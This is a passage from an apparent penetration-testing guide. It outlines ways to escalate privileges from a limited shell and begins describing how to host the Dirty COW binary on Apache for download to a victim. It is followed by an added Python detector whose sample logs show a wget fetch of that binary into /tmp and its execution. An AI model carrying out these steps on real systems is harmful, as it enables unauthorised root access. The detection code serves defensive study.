Privilege escalation
After exploiting a vulnerability, you will most of the time end up with a limited shell. The next step is to obtain an admin account on the victim machine. To accomplish this, you will need to choose one of the following methodologies:
- Transferring a file to the victim machine that gives you a root shell (for example, Dirty COW)
- Copy-pasting a PowerShell payload on a Windows OS (for example, Empire PowerShell)
- Using Metasploit/Meterpreter to escalate privileges (refer to Appendix B)
- Manually searching for misconfigured parameters in order to get an admin/root shell
File transfers
Let's look at a practical scenario. Say you have just obtained a limited shell on the victim's machine. You know that the OS is Linux, and you want to upload Dirty COW to the remote server and execute it there. Here are the steps for this method:
- Copy the Dirty COW binary into the target HTTP directory, located at /var/www/html.
- Start the web server using $service apache2 start.
- Download the file to the victim's machine...
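The detection-side counterpart to the transfer step above, added here as an example and not part of the original text: a small detector that walks auditd-style EXECVE records and flags a file fetched with wget/curl that is executed shortly afterwards. The log lines, the 600-second window and the handled output flags (-O/-o) are constructed assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed auditd-style EXECVE records (not real logs); the first three
# mirror the "serve the binary over HTTP, fetch it, run it" pattern.
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000001.000:101): argc=4 a0="wget" a1="http://203.0.113.5/dirtycow" a2="-O" a3="/tmp/dirtycow"
type=EXECVE msg=audit(1700000002.000:102): argc=3 a0="chmod" a1="+x" a2="/tmp/dirtycow"
type=EXECVE msg=audit(1700000003.000:103): argc=1 a0="/tmp/dirtycow"
type=EXECVE msg=audit(1700000010.000:104): argc=2 a0="ls" a1="-la"
type=EXECVE msg=audit(1700000020.000:105): argc=3 a0="curl" a1="-o" a2="/home/bob/notes.txt"
type=EXECVE msg=audit(1700000021.000:106): argc=2 a0="cat" a1="/home/bob/notes.txt"
"""

WINDOW_SECONDS = 600                       # assumed: exec within 10 min of download
DOWNLOADERS = {"wget": "-O", "curl": "-o"}  # tool -> flag that names the output path

_TS_RE = re.compile(r"msg=audit\((\d+\.\d+):\d+\)")
_ARG_RE = re.compile(r'a(\d+)="([^"]*)"')


def parse_execve(line: str) -> Optional[Tuple[float, List[str]]]:
    """Return (timestamp, argv) for an EXECVE record, or None for any other line."""
    ts = _TS_RE.search(line)
    if "type=EXECVE" not in line or not ts:
        return None
    args = sorted((int(i), v) for i, v in _ARG_RE.findall(line))
    return float(ts.group(1)), [v for _, v in args]


def output_path(argv: List[str]) -> Optional[str]:
    """Path a wget/curl invocation writes to, when given explicitly via -O/-o."""
    flag = DOWNLOADERS.get(argv[0])
    if flag and flag in argv[1:-1]:
        return argv[argv.index(flag) + 1]
    return None


def find_download_then_exec(log: str) -> List[Tuple[str, float, float]]:
    """Flag (path, download_ts, exec_ts) for files downloaded and then executed."""
    downloads: Dict[str, float] = {}
    alerts: List[Tuple[str, float, float]] = []
    for line in log.splitlines():
        rec = parse_execve(line)
        if not rec:
            continue
        ts, argv = rec
        path = output_path(argv)
        if path:
            downloads[path] = ts          # remember where the download landed
        elif argv[0] in downloads and ts - downloads[argv[0]] <= WINDOW_SECONDS:
            alerts.append((argv[0], downloads[argv[0]], ts))
    return alerts
```

Run `find_download_then_exec(SAMPLE_LOG)` to see that only /tmp/dirtycow is flagged; the downloaded notes file is read with cat, never executed, so it stays quiet.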